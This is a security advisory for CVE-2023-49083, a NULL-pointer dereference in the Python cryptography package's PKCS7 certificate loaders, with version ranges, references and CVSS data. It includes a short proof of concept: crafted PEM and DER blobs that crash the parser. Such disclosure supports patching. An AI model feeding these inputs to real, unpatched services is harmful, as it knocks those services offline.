GHSA-jfhm-5ghh-2f97
Vulnerability from github
Summary
Calling load_pem_pkcs7_certificates
or load_der_pkcs7_certificates
could lead to a NULL-pointer dereference and segfault.
PoC
Here is a Python code that triggers the issue: ```python from cryptography.hazmat.primitives.serialization.pkcs7 import load_der_pkcs7_certificates, load_pem_pkcs7_certificates
pem_p7 = b""" -----BEGIN PKCS7----- MAsGCSqGSIb3DQEHAg== -----END PKCS7----- """
der_p7 = b"\x30\x0B\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x07\x02"
load_pem_pkcs7_certificates(pem_p7) load_der_pkcs7_certificates(der_p7) ```
Impact
Exploitation of this vulnerability poses a serious risk of Denial of Service (DoS) for any application attempting to deserialize a PKCS7 blob/certificate. The consequences extend to potential disruptions in system availability and stability.
{ "affected": [ { "ecosystem_specific": { "affected_functions": [ "cryptography.hazmat.primitives.serialization.pkcs7.load_der_pkcs7_certificates", "cryptography.hazmat.primitives.serialization.pkcs7.load_pem_pkcs7_certificates" ] }, "package": { "ecosystem": "PyPI", "name": "cryptography" }, "ranges": [ { "events": [ { "introduced": "3.1" }, { "fixed": "41.0.6" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2023-49083" ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "github_reviewed_at": "2023-11-28T20:46:46Z", "nvd_published_at": "2023-11-29T19:15:07Z", "severity": "MODERATE" }, "details": "### Summary\n\nCalling `load_pem_pkcs7_certificates` or `load_der_pkcs7_certificates` could lead to a NULL-pointer dereference and segfault.\n\n### PoC\nHere is a Python code that triggers the issue:\n```python\nfrom cryptography.hazmat.primitives.serialization.pkcs7 import load_der_pkcs7_certificates, load_pem_pkcs7_certificates\n\npem_p7 = b\"\"\"\n-----BEGIN PKCS7-----\nMAsGCSqGSIb3DQEHAg==\n-----END PKCS7-----\n\"\"\"\n\nder_p7 = b\"\\x30\\x0B\\x06\\x09\\x2A\\x86\\x48\\x86\\xF7\\x0D\\x01\\x07\\x02\"\n\nload_pem_pkcs7_certificates(pem_p7)\nload_der_pkcs7_certificates(der_p7)\n```\n\n### Impact\nExploitation of this vulnerability poses a serious risk of Denial of Service (DoS) for any application attempting to deserialize a PKCS7 blob/certificate. The consequences extend to potential disruptions in system availability and stability.", "id": "GHSA-jfhm-5ghh-2f97", "modified": "2024-02-20T18:14:36Z", "published": "2023-11-28T20:46:46Z", "references": [ { "type": "WEB", "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-jfhm-5ghh-2f97" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49083" }, { "type": "WEB", "url": "https://github.com/pyca/cryptography/pull/9926" }, { "type": "WEB", "url": "https://github.com/pyca/cryptography/commit/f09c261ca10a31fe41b1262306db7f8f1da0e48a" }, { "type": "PACKAGE", "url": "https://github.com/pyca/cryptography" }, { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/cryptography/PYSEC-2023-254.yaml" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QMNTYMUGFJSDBYBU22FUYBHFRZODRKXV" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/11/29/2" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "type": "CVSS_V3" } ], "summary": "cryptography vulnerable to NULL-dereference when loading PKCS7 certificates" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.